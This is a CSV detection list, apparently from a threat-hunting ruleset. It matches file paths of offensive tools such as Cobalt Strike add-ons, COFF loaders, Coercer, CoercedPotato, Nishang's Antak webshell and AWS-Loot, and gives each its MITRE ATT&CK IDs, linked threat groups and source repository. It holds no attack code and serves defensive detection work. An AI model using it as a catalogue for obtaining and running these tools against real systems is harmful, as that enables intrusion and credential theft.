"*/coap-resources.nse*",".{0,1000}\/coap\-resources\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6128"
"*/cobaltclip.c*",".{0,1000}\/cobaltclip\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","N/A","10","","N/A","","","","6129"
"*/cobaltclip.o*",".{0,1000}\/cobaltclip\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","N/A","10","","N/A","","","","6130"
"*/Cobalt-Clip/*",".{0,1000}\/Cobalt\-Clip\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","N/A","10","","N/A","","","","6131"
"*/cobaltstrike*",".{0,1000}\/cobaltstrike.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","6132"
"*/cobalt-strike*",".{0,1000}\/cobalt\-strike.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","6133"
"*/cobaltstrike/c2lint*",".{0,1000}\/cobaltstrike\/c2lint.{0,1000}","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","0","#linux","N/A","10","10","1053","172","2024-06-25T11:10:54Z","2020-03-23T14:13:16Z","6134"
"*/CobaltStrike_OpenBeacon.git*",".{0,1000}\/CobaltStrike_OpenBeacon\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","alternative to the Cobalt Strike Beacon","T1071.001 - T1041 - T1219 - T1105","TA0011","N/A","N/A","C2","https://github.com/ElJaviLuki/CobaltStrike_OpenBeacon","1","1","N/A","N/A","10","10","225","40","2024-03-13T04:32:57Z","2023-12-27T18:37:46Z","6135"
"*/cobaltstrike-nemesis-connector/*",".{0,1000}\/cobaltstrike\-nemesis\-connector\/.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","6136"
"*/code_exec.ps1*",".{0,1000}\/code_exec\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","6137"
"*/CodeBuildLooter.py*",".{0,1000}\/CodeBuildLooter\.py.{0,1000}","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tool","https://github.com/sebastian-mora/AWS-Loot","1","1","N/A","N/A","N/A","1","70","25","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z","6138"
"*/CoercedPotato.cpp*",".{0,1000}\/CoercedPotato\.cpp.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","1","N/A","N/A","10","3","204","31","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z","6139"
"*/CoercedPotato.git*",".{0,1000}\/CoercedPotato\.git.{0,1000}","offensive_tool_keyword","CoercedPotato","CoercedPotato From Patate (LOCAL/NETWORK SERVICE) to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 Windows 11 and Server 2022.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Prepouce/CoercedPotato","1","1","N/A","N/A","10","4","366","66","2024-08-26T08:09:00Z","2023-09-11T19:04:29Z","6140"
"*/CoercedPotatoRDLL.git*",".{0,1000}\/CoercedPotatoRDLL\.git.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","1","N/A","N/A","10","3","204","31","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z","6141"
"*/coercer.egg-info*",".{0,1000}\/coercer\.egg\-info.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","6142"
"*/Coercer.git*",".{0,1000}\/Coercer\.git.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","6143"
"*/Coercer.py*",".{0,1000}\/Coercer\.py.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","6144"
"*/Coercer/*.py",".{0,1000}\/Coercer\/.{0,1000}\.py","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","6145"
"*/coercer_output_*.txt*",".{0,1000}\/coercer_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","6146"
"*/CoffeeLdr.c*",".{0,1000}\/CoffeeLdr\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cracked5pider/CoffeeLdr","1","1","N/A","N/A","10","10","286","38","2023-12-03T18:09:34Z","2022-07-18T15:21:11Z","6147"
"*/CoffeeLdr/*",".{0,1000}\/CoffeeLdr\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cracked5pider/CoffeeLdr","1","1","N/A","N/A","10","10","286","38","2023-12-03T18:09:34Z","2022-07-18T15:21:11Z","6148"
"*/COFFLoader*",".{0,1000}\/COFFLoader.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","N/A","10","10","520","78","2025-04-03T14:57:10Z","2021-02-19T19:14:43Z","6149"
"*/COFFLoader.exe*",".{0,1000}\/COFFLoader\.exe.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","1","N/A","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","6150"
"*/COFFLoader2/*",".{0,1000}\/COFFLoader2\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Load and execute COFF files and Cobalt Strike BOFs in-memory","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Yaxser/COFFLoader2","1","1","N/A","N/A","10","10","215","44","2022-09-13T14:58:30Z","2021-12-14T07:49:17Z","6151"
"*/collection/screengrab*",".{0,1000}\/collection\/screengrab.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","6152"
"*/com.webtrufflehog.json*",".{0,1000}\/com\.webtrufflehog\.json.{0,1000}","offensive_tool_keyword","webtrufflehog","Browser extension that leverages TruffleHog to scan web traffic in real-time for exposed secrets","T1552.001 - T1040 - T1036 - T1087","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/c3l3si4n/webtrufflehog","1","0","N/A","N/A","7","2","102","10","2024-12-29T23:26:35Z","2024-12-28T19:53:09Z","6154"
"*/com/blackh4t/*",".{0,1000}\/com\/blackh4t\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","1","N/A","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","6155"
"*/combine_harvester.git*",".{0,1000}\/combine_harvester\.git.{0,1000}","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","1","N/A","N/A","10","2","108","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z","6156"
"*/comfoo.profile*",".{0,1000}\/comfoo\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","6157"
"*/COMHijackToolkit.ps1*",".{0,1000}\/COMHijackToolkit\.ps1.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","1","N/A","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","6158"
